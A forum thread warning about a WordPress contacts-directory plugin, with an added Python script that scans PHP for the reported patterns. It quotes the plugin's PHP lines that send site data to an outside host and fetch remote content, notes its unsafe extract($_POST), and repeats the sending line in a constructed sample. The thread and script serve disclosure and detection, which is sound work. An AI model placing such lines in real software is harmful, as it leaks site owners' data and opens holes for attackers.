
Security warning


  • danbpfr
    Participant

    @chouf1

    Hi BP people,

    I want to warn you against the wp-contacts-directories plugin. This plugin was recently updated and works with WP and WPMU/BP…. If you already use it, uninstall it.

    If you know what you are doing, take care with it, because this plugin contains many security holes (e.g. extract($_POST);…) and spy code at lines 556 to 562 which contains something like this:

    $res = file_get_contents("http://ahlul.web.id/tools/plugcheck/?n=$n&h=$h&m=$e");

    In another if statement, line 577, we find:

    $output = file_get_contents("http://ahlul.web.id/tools/plugads/wpcontact.php");

    This is illegal as far as I know…

    Anyway, this is a perfect example of what not to do in matters of security, PHP and open source coding.

    Of course I also posted this on the WP forum.

    http://wordpress.org/support/topic/379688
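
One way to audit an installed plugin's source for the two patterns reported in the post above: `extract()` applied to request data, and a fetch function called with a hard-coded remote URL. This is an added example, not part of the original thread or the plugin's code; the host `tracker.example`, the function `wpcd_save` and the sample source are constructed, and the line-by-line regex scan is an assumed approximation (it does not parse PHP).

```python
import re
from urllib.parse import urlsplit

# extract() on request data lets any request overwrite local variables.
EXTRACT_RE = re.compile(r"\bextract\s*\(\s*\$(_POST|_GET|_REQUEST|_COOKIE)\b")
# Fetch functions called with a hard-coded http(s) URL literal.
FETCH_RE = re.compile(
    r"\b(file_get_contents|fopen|curl_init|wp_remote_get|wp_remote_post)\s*\(\s*"
    r"""(["'])(https?://[^"']+)\2""")

def scan_php(source, allowed_hosts=()):
    """Return (line_no, rule, detail) findings for one PHP source string."""
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        if line.lstrip().startswith(("//", "#", "*")):
            continue  # skip whole-line comments only
        m = EXTRACT_RE.search(line)
        if m:
            findings.append((no, "extract-superglobal", "$" + m.group(1)))
        for m in FETCH_RE.finditer(line):
            quote, url = m.group(2), m.group(3)
            host = (urlsplit(url).hostname or "").lower()
            if host in allowed_hosts:
                continue
            # PHP interpolates $vars in double-quoted strings, so a "$" in
            # the URL means values from the site are sent to the remote host.
            with_data = quote == '"' and "$" in url
            findings.append(
                (no, "remote-fetch-with-data" if with_data else "remote-fetch", host))
    return findings

# Constructed sample modeled on the lines quoted in the post; not the plugin's file.
SAMPLE = '''<?php
// constructed sample
function wpcd_save() {
    extract($_POST);
    $res = file_get_contents("http://tracker.example/tools/plugcheck/?n=$n&h=$h&m=$e");
    if ($res) {
        $output = file_get_contents("http://tracker.example/tools/plugads/wpcontact.php");
    }
    $feed = wp_remote_get('https://api.wordpress.org/plugins/info/1.0/');
}
'''

if __name__ == "__main__":
    for finding in scan_php(SAMPLE, allowed_hosts=("api.wordpress.org",)):
        print(finding)
```

Hosts passed in `allowed_hosts` are the ones the site owner expects the plugin to contact; everything else is reported for manual review.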

Viewing 4 replies - 1 through 4 (of 4 total)

  • Hugo Ashmore
    Keymaster

    @hnla

    Hmm available for all in the main WP plugin repository, this is what’s not great about all and sundry banging out plugins without any apparent checks in place, most users haven’t a clue what they are installing really.

    Think it’s been mentioned in general before but there really needs to be a sanctioned, vetted, approved plugin repository where at least users can be directed and assured of reasonable security then it’s a case of install plugins from elsewhere and on your own head be it.


    danbpfr
    Participant

    @chouf1

    I am very surprised at the lack of feedback from the community to this kind of warning! What a deafening silence…


    Hugo Ashmore
    Keymaster

    @hnla

    It’s an odd response.. or lack of

    I’d kind of like to hear that a project that is getting as mature as WP (this isn’t really a BP issue after all) would be considering this aspect of plugin authoring and placing some form of control or seal of approval on certain plugins


    peterverkooijen
    Participant

    @peterverkooijen

    Thanks for the warning!

  • The topic ‘Security warning’ is closed to new replies.